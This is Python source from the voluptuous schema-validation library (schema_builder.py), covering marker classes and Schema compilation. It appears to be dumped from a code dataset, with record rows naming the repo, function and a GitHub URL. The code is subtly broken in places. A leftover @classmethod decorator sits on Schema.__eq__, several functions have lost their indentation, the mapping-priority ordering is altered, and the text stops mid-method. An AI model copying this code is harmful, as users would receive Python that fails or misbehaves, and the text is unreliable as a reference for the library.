    # priority list for map sorting (in order of checking)
    # We want Extra to match last, because it's a catch-all. On the other hand,
    # Remove markers should match first (since invalid values will not
    # raise an Error, instead the validator will check if other schemas match
    # the same value).
    # NOTE: checks run in list order, so classes (which are also callable)
    # are classified by is_type (priority 4) before the is_callable test.
    priority = [(1, is_remove),  # Remove highest priority after values
                (2, is_marker),  # then other Markers
                (4, is_type),  # types/classes lowest before Extra
                (3, is_callable),  # callables after markers
                (5, is_extra)]  # Extra lowest priority
    def item_priority(item_):
        key_ = item_[0]
        for i, check_ in priority:
            if check_(key_):
                return i
        # values have highest priorities
        return 0
    return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
    """Iterate over schema in a meaningful order."""
    # Without this, Extra might appear first in the iterator, and fail to
    # validate a key even though it's a Required that has its own validation,
    # generating a false positive.
    # Ordering comes from ``_sort_item``: literal keys first, then Remove
    # markers, other Markers, callables, types, and Extra last.
    return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
    """Return iterator over object attributes. Respect objects with
    defined __slots__.
    """
    attrs = {}
    try:
        attrs = vars(obj)
    except TypeError:
        # vars() fails for objects without a __dict__; a namedtuple
        # exposes its fields through _asdict() instead.
        if hasattr(obj, '_asdict'):
            attrs = obj._asdict()
    for item in iteritems(attrs):
        yield item
    # Slot-backed attributes never appear in vars(); walk __slots__ too.
    try:
        slots = obj.__slots__
    except AttributeError:
        pass
    else:
        for key in slots:
            if key != '__dict__':
                yield (key, getattr(obj, key))
class Msg(object):
    """Report a user-friendly message if a schema fails to validate.
    >>> validate = Schema(
    ...   Msg(['one', 'two', int],
    ...       'should be one of "one", "two" or an integer'))
    >>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
    ...   validate(['three'])
    Messages are only applied to invalid direct descendants of the schema:
    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
    >>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
    ...   validate([['three']])
    The type which is thrown can be overridden but needs to be a subclass of Invalid
    >>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
    ...   validate = Schema(Msg([int], 'should be int', cls=KeyError))
    If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
    >>> try:
    ...  validate(['three'])
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], er.RangeInvalid)
    """
    def __init__(self, schema, msg, cls=None):
        # Only Invalid subclasses integrate with voluptuous error handling.
        if cls and not issubclass(cls, er.Invalid):
            raise er.SchemaError("Msg can only use subclases of"
                                 " Invalid as custom class")
        self._schema = schema
        self.schema = Schema(schema)
        self.msg = msg
        self.cls = cls
    def __call__(self, v):
        try:
            return self.schema(v)
        except er.Invalid as e:
            # Replace only errors raised directly by this schema level;
            # deeper errors already carry a more specific message/path.
            if len(e.path) > 1:
                raise e
            else:
                raise (self.cls or er.Invalid)(self.msg)
    def __repr__(self):
        return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Indicate that we should work with attributes, not keys."""
    def __init__(self, schema, cls=UNDEFINED):
        # When given, ``cls`` restricts validation to instances of that
        # class; UNDEFINED accepts any object.
        self.cls = cls
        super(Object, self).__init__(schema)
class VirtualPathComponent(str):
    """Error-path component for virtual groups (e.g. Exclusive/Inclusive
    group labels), rendered as ``<label>``.
    """
    def __str__(self):
        return '<' + self + '>'
    def __repr__(self):
        return str(self)
# Markers.py
class Marker(object):
    """Mark nodes for special treatment.
    A marker wraps a schema node and delegates validation to it, while
    string conversion, comparison and hashing all defer to the wrapped
    schema so the marker can stand in for the raw key in mapping schemas.
    """
    def __init__(self, schema_, msg=None, description=None):
        self.msg = msg
        self.description = description
        self.schema = schema_
        self._schema = Schema(schema_)
    def __call__(self, v):
        try:
            return self._schema(v)
        except er.Invalid as e:
            # The custom message only replaces errors raised directly at
            # this node; nested errors keep their own message and path.
            if not self.msg or len(e.path) > 1:
                raise
            raise er.Invalid(self.msg)
    def __str__(self):
        return str(self.schema)
    def __repr__(self):
        return repr(self.schema)
    def __lt__(self, other):
        rhs = other.schema if isinstance(other, Marker) else other
        return self.schema < rhs
    def __hash__(self):
        return hash(self.schema)
    def __eq__(self, other):
        return self.schema == other
    def __ne__(self, other):
        return not self.__eq__(other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default
    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}
    If 'required' flag is set for an entire schema, optional keys aren't required
    >>> schema = Schema({
    ...    Optional('key'): str,
    ...    'key2': str
    ... }, required=True)
    >>> schema({'key2':'value'})
    {'key2': 'value'}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
        # default_factory normalises a value-or-callable default into a
        # zero-argument callable; UNDEFINED means "no default".
        self.default = default_factory(default)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.
    Exclusive keys inherited from Optional:
    >>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}
    Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...   schema({'alpha': 30, 'beta': 45})
    For example, API can provides multiple types of authentication, but only one works in the same time:
    >>> msg = 'Please, use only one type of authentication at the same time.'
    >>> schema = Schema({
    ... Exclusive('classic', 'auth', msg=msg):{
    ...     Required('email'): basestring,
    ...     Required('password'): basestring
    ...     },
    ... Exclusive('internal', 'auth', msg=msg):{
    ...     Required('secret_key'): basestring
    ...     },
    ... Exclusive('social', 'auth', msg=msg):{
    ...     Required('social_network'): basestring,
    ...     Required('token'): basestring
    ...     }
    ... })
    >>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
    ...     schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
    ...             'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
    """
    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
        # Label shared by all keys that are mutually exclusive with this
        # one; checked in Schema._compile_dict.
        self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
    """ Mark a node in the schema as inclusive.
    Inclusive keys inherited from Optional:
    >>> schema = Schema({
    ...     Inclusive('filename', 'file'): str,
    ...     Inclusive('mimetype', 'file'): str
    ... })
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True
    Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...     schema({'filename': 'dog.jpg'})
    If none of the keys in the group are present, it is accepted:
    >>> schema({})
    {}
    For example, API can return 'height' and 'width' together, but not separately.
    >>> msg = "Height and width must exist together"
    >>> schema = Schema({
    ...     Inclusive('height', 'size', msg=msg): int,
    ...     Inclusive('width', 'size', msg=msg): int
    ... })
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'height': 100})
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'width': 100})
    >>> data = {'height': 100, 'width': 100}
    >>> data == schema(data)
    True
    """
    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        super(Inclusive, self).__init__(schema, msg=msg,
                                        default=default,
                                        description=description)
        # Label shared by all keys that must appear together (or not at
        # all); checked in Schema._compile_dict.
        self.group_of_inclusion = group_of_inclusion
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.
    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...   schema({})
    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
        # default_factory normalises a value-or-callable default into a
        # zero-argument callable; UNDEFINED means "no default".
        self.default = default_factory(default)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead, these
    keys will be treated as extras.
    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...    schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}
    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """
    def __call__(self, v):
        # Validate like an ordinary marker, but return the Remove class
        # itself as a sentinel; the mapping/sequence validators detect it
        # and drop the value from the output.
        super(Remove, self).__call__(v)
        return self.__class__
    def __repr__(self):
        return "Remove(%r)" % (self.schema,)
    def __hash__(self):
        # Identity-based hash (unlike Marker's schema-based hash) so that
        # several Remove markers can coexist as distinct schema-dict keys.
        return object.__hash__(self)
def message(default=None, cls=None):
    """Convenience decorator to allow functions to provide a message.
    Set a default message:
    >>> @message('not an integer')
    ... def isint(v):
    ...   return int(v)
    >>> validate = Schema(isint())
    >>> with raises(er.MultipleInvalid, 'not an integer'):
    ...   validate('a')
    The message can be overridden on a per validator basis:
    >>> validate = Schema(isint('bad'))
    >>> with raises(er.MultipleInvalid, 'bad'):
    ...   validate('a')
    The class thrown too:
    >>> class IntegerInvalid(er.Invalid): pass
    >>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
    >>> try:
    ...   validate('a')
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], IntegerInvalid)
    """
    if cls and not issubclass(cls, er.Invalid):
        raise er.SchemaError("message can only use subclases of Invalid as custom class")
    def decorator(f):
        @wraps(f)
        def check(msg=None, clsoverride=None):
            @wraps(f)
            def wrapper(*args, **kwargs):
                try:
                    return f(*args, **kwargs)
                except ValueError:
                    # Resolution order: per-call override, decorator
                    # default, then the generic fallback.
                    raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
            return wrapper
        return check
    return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema.infer | python | def infer(cls, data, **kwargs):
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs) | Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L210-L251 | [
"def value_to_schema_type(value):\n if isinstance(value, dict):\n if len(value) == 0:\n return dict\n return {k: value_to_schema_type(v)\n for k, v in iteritems(value)}\n if isinstance(value, list):\n if len(value) == 0:\n return list\n else:\n ... | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
    def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
        """Create a new Schema.
        :param schema: Validation schema. See :module:`voluptuous` for details.
        :param required: Keys defined in the schema must be in the data.
        :param extra: Specify how extra keys in the data are treated:
            - :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
              extra keys (raise ``Invalid``).
            - :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
              keys in the output.
            - :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
              from the output.
            - Any value other than the above defaults to
              :const:`~voluptuous.PREVENT_EXTRA`
        """
        self.schema = schema
        self.required = required
        self.extra = int(extra)  # ensure the value is an integer
        # Compile once up front; every validation call reuses the result.
        self._compiled = self._compile(schema)
@classmethod
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
    def __str__(self):
        # Display the raw (uncompiled) schema tree.
        return str(self.schema)
    def __repr__(self):
        # ``'??'`` appears when ``extra`` was given a non-standard value.
        return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
            self.schema, self._extra_to_name.get(self.extra, '??'),
            self.required, id(self))
    def __call__(self, data):
        """Validate data against this schema.
        Returns the validated (possibly coerced) data; single errors are
        wrapped so callers always see ``MultipleInvalid``.
        """
        try:
            return self._compiled([], data)
        except er.MultipleInvalid:
            raise
        except er.Invalid as e:
            raise er.MultipleInvalid([e])
    def _compile(self, schema):
        """Dispatch *schema* to the matching compiler and return a
        ``validator(path, data)`` callable.
        """
        if schema is Extra:
            # Extra passes any value through untouched.
            return lambda _, v: v
        if schema is Self:
            # Self recurses into this schema; looked up lazily because
            # ``self._compiled`` is still being assigned during __init__.
            return lambda p, v: self._compiled(p, v)
        elif hasattr(schema, "__voluptuous_compile__"):
            # A schema object may supply its own compilation hook.
            return schema.__voluptuous_compile__(self)
        if isinstance(schema, Object):
            return self._compile_object(schema)
        if isinstance(schema, _Mapping):
            return self._compile_dict(schema)
        elif isinstance(schema, list):
            return self._compile_list(schema)
        elif isinstance(schema, tuple):
            return self._compile_tuple(schema)
        elif isinstance(schema, (frozenset, set)):
            return self._compile_set(schema)
        type_ = type(schema)
        if inspect.isclass(schema):
            type_ = schema
        # Plain values, builtin types and arbitrary callables all compile
        # to a scalar validator.
        if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
                     list, dict, type(None)) or callable(schema):
            return _compile_scalar(schema)
        raise er.SchemaError('unsupported schema data type %r' %
                             type(schema).__name__)
    def _compile_mapping(self, schema, invalid_msg=None):
        """Create validator for given mapping.
        Returns a ``validate_mapping(path, iterable, out)`` closure shared
        by the dict and object compilers: ``iterable`` yields (key, value)
        pairs from the data and validated pairs are written into ``out``,
        which is also returned.
        """
        invalid_msg = invalid_msg or 'mapping value'
        # Keys that may be required
        all_required_keys = set(key for key in schema
                                if key is not Extra and
                                ((self.required and not isinstance(key, (Optional, Remove))) or
                                 isinstance(key, Required)))
        # Keys that may have defaults
        all_default_keys = set(key for key in schema
                               if isinstance(key, Required) or
                               isinstance(key, Optional))
        _compiled_schema = {}
        for skey, svalue in iteritems(schema):
            new_key = self._compile(skey)
            new_value = self._compile(svalue)
            _compiled_schema[skey] = (new_key, new_value)
        candidates = list(_iterate_mapping_candidates(_compiled_schema))
        # After we have the list of candidates in the correct order, we want to apply some optimization so that each
        # key in the data being validated will be matched against the relevant schema keys only.
        # No point in matching against different keys
        additional_candidates = []
        candidates_by_key = {}
        for skey, (ckey, cvalue) in candidates:
            if type(skey) in primitive_types:
                candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
            elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
                candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
            else:
                # These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
                additional_candidates.append((skey, (ckey, cvalue)))
        def validate_mapping(path, iterable, out):
            required_keys = all_required_keys.copy()
            # Build a map of all provided key-value pairs.
            # The type(out) is used to retain ordering in case a ordered
            # map type is provided as input.
            key_value_map = type(out)()
            for key, value in iterable:
                key_value_map[key] = value
            # Insert default values for non-existing keys.
            for key in all_default_keys:
                if not isinstance(key.default, Undefined) and \
                        key.schema not in key_value_map:
                    # A default value has been specified for this missing
                    # key, insert it.
                    key_value_map[key.schema] = key.default()
            error = None
            errors = []
            for key, value in key_value_map.items():
                key_path = path + [key]
                remove_key = False
                # Optimization. Validate against the matching key first, then fallback to the rest
                relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
                # compare each given key/value against all compiled key/values
                # schema key, (compiled key, compiled value)
                for skey, (ckey, cvalue) in relevant_candidates:
                    try:
                        new_key = ckey(key_path, key)
                    except er.Invalid as e:
                        if len(e.path) > len(key_path):
                            raise
                        if not error or len(e.path) > len(error.path):
                            error = e
                        continue
                    # Backtracking is not performed once a key is selected, so if
                    # the value is invalid we immediately throw an exception.
                    exception_errors = []
                    # check if the key is marked for removal
                    is_remove = new_key is Remove
                    try:
                        cval = cvalue(key_path, value)
                        # include if it's not marked for removal
                        if not is_remove:
                            out[new_key] = cval
                        else:
                            remove_key = True
                            continue
                    except er.MultipleInvalid as e:
                        exception_errors.extend(e.errors)
                    except er.Invalid as e:
                        exception_errors.append(e)
                    if exception_errors:
                        if is_remove or remove_key:
                            continue
                        for err in exception_errors:
                            if len(err.path) <= len(key_path):
                                err.error_type = invalid_msg
                            errors.append(err)
                        # If there is a validation error for a required
                        # key, this means that the key was provided.
                        # Discard the required key so it does not
                        # create an additional, noisy exception.
                        required_keys.discard(skey)
                        break
                    # Key and value okay, mark as found in case it was
                    # a Required() field.
                    required_keys.discard(skey)
                    break
                else:
                    if remove_key:
                        # remove key
                        continue
                    elif self.extra == ALLOW_EXTRA:
                        out[key] = value
                    elif self.extra != REMOVE_EXTRA:
                        errors.append(er.Invalid('extra keys not allowed', key_path))
                    # else REMOVE_EXTRA: ignore the key so it's removed from output
            # for any required keys left that weren't found and don't have defaults:
            for key in required_keys:
                msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
                errors.append(er.RequiredFieldInvalid(msg, path + [key]))
            if errors:
                raise er.MultipleInvalid(errors)
            return out
        return validate_mapping
    def _compile_object(self, schema):
        """Validate an object.
        Has the same behavior as dictionary validator but work with object
        attributes.
        For example:
        >>> class Structure(object):
        ...     def __init__(self, one=None, three=None):
        ...         self.one = one
        ...         self.three = three
        ...
        >>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
        >>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
        ...   validate(Structure(one='three'))
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='object value')
        def validate_object(path, data):
            if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
                raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
            # Attributes whose value is None are treated as absent.
            iterable = _iterate_object(data)
            iterable = ifilter(lambda item: item[1] is not None, iterable)
            out = base_validate(path, iterable, {})
            # Rebuild an instance of the same type from validated attributes.
            return type(data)(**out)
        return validate_object
    def _compile_dict(self, schema):
        """Validate a dictionary.
        A dictionary schema can contain a set of values, or at most one
        validator function/type.
        A dictionary schema will only validate a dictionary:
        >>> validate = Schema({})
        >>> with raises(er.MultipleInvalid, 'expected a dictionary'):
        ...   validate([])
        An invalid dictionary value:
        >>> validate = Schema({'one': 'two', 'three': 'four'})
        >>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
        ...   validate({'one': 'three'})
        An invalid key:
        >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
        ...   validate({'two': 'three'})
        Validation function, in this case the "int" type:
        >>> validate = Schema({'one': 'two', 'three': 'four', int: str})
        Valid integer input:
        >>> validate({10: 'twenty'})
        {10: 'twenty'}
        By default, a "type" in the schema (in this case "int") will be used
        purely to validate that the corresponding value is of that type. It
        will not Coerce the value:
        >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
        ...   validate({'10': 'twenty'})
        Wrap them in the Coerce() function to achieve this:
        >>> from voluptuous import Coerce
        >>> validate = Schema({'one': 'two', 'three': 'four',
        ...                    Coerce(int): str})
        >>> validate({'10': 'twenty'})
        {10: 'twenty'}
        Custom message for required key
        >>> validate = Schema({Required('one', 'required'): 'two'})
        >>> with raises(er.MultipleInvalid, "required @ data['one']"):
        ...   validate({})
        (This is to avoid unexpected surprises.)
        Multiple errors for nested field in a dict:
        >>> validate = Schema({
        ...     'adict': {
        ...         'strfield': str,
        ...         'intfield': int
        ...     }
        ... })
        >>> try:
        ...     validate({
        ...         'adict': {
        ...             'strfield': 123,
        ...             'intfield': 'one'
        ...         }
        ...     })
        ... except er.MultipleInvalid as e:
        ...     print(sorted(str(i) for i in e.errors))  # doctest: +NORMALIZE_WHITESPACE
        ["expected int for dictionary value @ data['adict']['intfield']",
         "expected str for dictionary value @ data['adict']['strfield']"]
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='dictionary value')
        # Collect Exclusive/Inclusive markers by their group label so the
        # group constraints can be checked before per-key validation.
        groups_of_exclusion = {}
        groups_of_inclusion = {}
        for node in schema:
            if isinstance(node, Exclusive):
                g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
                g.append(node)
            elif isinstance(node, Inclusive):
                g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
                g.append(node)
        def validate_dict(path, data):
            if not isinstance(data, dict):
                raise er.DictInvalid('expected a dictionary', path)
            errors = []
            # At most one key per exclusion group may be present.
            for label, group in groups_of_exclusion.items():
                exists = False
                for exclusive in group:
                    if exclusive.schema in data:
                        if exists:
                            msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
                                "two or more values in the same group of exclusion '%s'" % label
                            next_path = path + [VirtualPathComponent(label)]
                            errors.append(er.ExclusiveInvalid(msg, next_path))
                            break
                        exists = True
            if errors:
                raise er.MultipleInvalid(errors)
            # Keys of an inclusion group must appear all together or not at all.
            for label, group in groups_of_inclusion.items():
                included = [node.schema in data for node in group]
                if any(included) and not all(included):
                    msg = "some but not all values in the same group of inclusion '%s'" % label
                    for g in group:
                        if hasattr(g, 'msg') and g.msg:
                            msg = g.msg
                            break
                    next_path = path + [VirtualPathComponent(label)]
                    errors.append(er.InclusiveInvalid(msg, next_path))
                    break
            if errors:
                raise er.MultipleInvalid(errors)
            # Preserve the input's mapping type (e.g. OrderedDict) in the output.
            out = data.__class__()
            return base_validate(path, iteritems(data), out)
        return validate_dict
    def _compile_sequence(self, schema, seq_type):
        """Validate a sequence type.
        This is a sequence of valid values or validators tried in order.
        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        # Sub-schemas are compiled once at schema-construction time.
        _compiled = [self._compile(s) for s in schema]
        seq_type_name = seq_type.__name__
        def validate_sequence(path, data):
            if not isinstance(data, seq_type):
                raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
            # Empty seq schema, allow any data.
            if not schema:
                if data:
                    raise er.MultipleInvalid([
                        er.ValueInvalid('not a valid value', [value]) for value in data
                    ])
                return data
            out = []
            invalid = None
            errors = []
            index_path = UNDEFINED
            for i, value in enumerate(data):
                index_path = path + [i]
                invalid = None
                # Each element must satisfy at least one sub-schema.
                for validate in _compiled:
                    try:
                        cval = validate(index_path, value)
                        if cval is not Remove:  # do not include Remove values
                            out.append(cval)
                        break
                    except er.Invalid as e:
                        if len(e.path) > len(index_path):
                            raise
                        invalid = e
                else:
                    errors.append(invalid)
            if errors:
                raise er.MultipleInvalid(errors)
            # Rebuild the caller's sequence type; namedtuples need
            # positional-argument construction.
            if _isnamedtuple(data):
                return type(data)(*out)
            else:
                return type(data)(out)
        return validate_sequence
    def _compile_tuple(self, schema):
        """Validate a tuple.
        A tuple is a sequence of valid values or validators tried in order.
        >>> validator = Schema(('one', 'two', int))
        >>> validator(('one',))
        ('one',)
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator((3.5,))
        >>> validator((1,))
        (1,)
        """
        # Shares the generic sequence machinery; only the container differs.
        return self._compile_sequence(schema, tuple)
    def _compile_list(self, schema):
        """Validate a list.
        A list is a sequence of valid values or validators tried in order.
        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        # Shares the generic sequence machinery; only the container differs.
        return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
    def extend(self, schema, required=None, extra=None):
        """Create a new `Schema` by merging this and the provided `schema`.
        Neither this `Schema` nor the provided `schema` are modified. The
        resulting `Schema` inherits the `required` and `extra` parameters of
        this, unless overridden.
        Both schemas must be dictionary-based.
        :param schema: dictionary to extend this `Schema` with
        :param required: if set, overrides `required` of this `Schema`
        :param extra: if set, overrides `extra` of this `Schema`
        """
        assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
        result = self.schema.copy()
        # returns the key that may have been passed as argument to Marker constructor
        def key_literal(key):
            return (key.schema if isinstance(key, Marker) else key)
        # build a map that takes the key literals to the needed objects
        # literal -> Required|Optional|literal
        result_key_map = dict((key_literal(key), key) for key in result)
        # for each item in the extension schema, replace duplicates
        # or add new keys
        for key, value in iteritems(schema):
            # if the key is already in the dictionary, we need to replace it
            # transform key to literal before checking presence
            if key_literal(key) in result_key_map:
                result_key = result_key_map[key_literal(key)]
                result_value = result[result_key]
                # if both are dictionaries, we need to extend recursively
                # create the new extended sub schema, then remove the old key and add the new one
                if type(result_value) == dict and type(value) == dict:
                    new_value = Schema(result_value).extend(value).schema
                    del result[result_key]
                    result[key] = new_value
                # one or the other or both are not sub-schemas, simple replacement is fine
                # remove old key and add new one
                else:
                    del result[result_key]
                    result[key] = value
            # key is new and can simply be added
            else:
                result[key] = value
        # recompile and send old object
        result_cls = type(self)
        result_required = (required if required is not None else self.required)
        result_extra = (extra if extra is not None else self.extra)
        return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_mapping | python | def _compile_mapping(self, schema, invalid_msg=None):
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
